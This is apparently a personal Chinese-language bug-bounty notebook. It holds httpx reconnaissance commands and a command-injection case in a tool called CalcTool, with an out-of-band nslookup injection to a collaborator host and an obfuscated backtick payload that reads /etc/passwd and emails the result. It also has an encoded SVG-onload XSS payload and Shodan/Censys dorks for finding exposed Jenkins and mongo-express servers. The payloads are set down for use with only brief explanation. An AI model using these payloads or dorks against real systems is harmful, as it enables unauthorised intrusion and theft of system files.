随手记
一、使用重置2FA 功能可能对 Hackerone 的用户帐户进行潜在的 DOS 攻击
收集所有活动域并使用 httpx 对其进行屏幕截图
httpx -l allDomains.txt -o liveDomains.txt
收集存活域名
httpx -l liveDomains.txt -srd subsScreens -ss
输出图像到 subsScreens 目录下
CalcTool 代码审查 发现命令注入漏洞
margs = "-s CalcTool Output: '" + jobtitle + "' " + email + " < LOGFILE"
System ("mail" + text)
这些字符串操作的最终结果是以下命令:
mail -s 'CalcTool Output: job173' [email protected] < /path/to/LOGFILE
传参污染
-------------------------384837281
Content-Disposition: form-data; name="frequency"
10
Title "$(nslookup mycollaborator.com)"
-------------------------384837281
构造命令执行 payload
mail -s "CalcTool Output: `a=ca;b=t;$a$b /e*c/pa*s*d > /tmp/synack77`" [email protected] < /tmp/synack77
反引号内的命令在运行 mail 命令之前执行。因此,在 mail 命令运行之前,命令的输出将存储在 /tmp/synack77 中,并且我们会收到一封包含命令结果的电子邮件。在本例中,我们正在读取 /etc/passwd。
param={"data":"<h1>"}
><%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)><!—
?param={"data":"<%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)><!--"}
。>dork
censys:services.software.product=`jenkins`
shodan:Set-Cookie: mongo-express=" "200 OK"